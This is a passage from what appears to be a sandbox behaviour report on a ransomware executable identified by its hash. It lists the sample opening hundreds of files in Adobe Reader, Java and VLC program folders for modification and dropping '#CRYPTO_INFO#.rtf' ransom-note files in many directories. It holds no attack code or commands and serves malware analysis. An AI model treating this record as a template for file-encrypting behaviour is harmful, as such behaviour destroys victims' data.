Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\reflow.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-focus_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\combine_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jawt.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\createpdf.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\schemagen.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\variant.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\rt.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_ok.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\share_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\index_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_removeme-default_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_sv_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pt-br_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_it_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ar-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\unpack200.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_hover_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\accessibility.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\java.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfr\profile.jfc 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-no-text_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\ssvagent.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\accessibility_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe 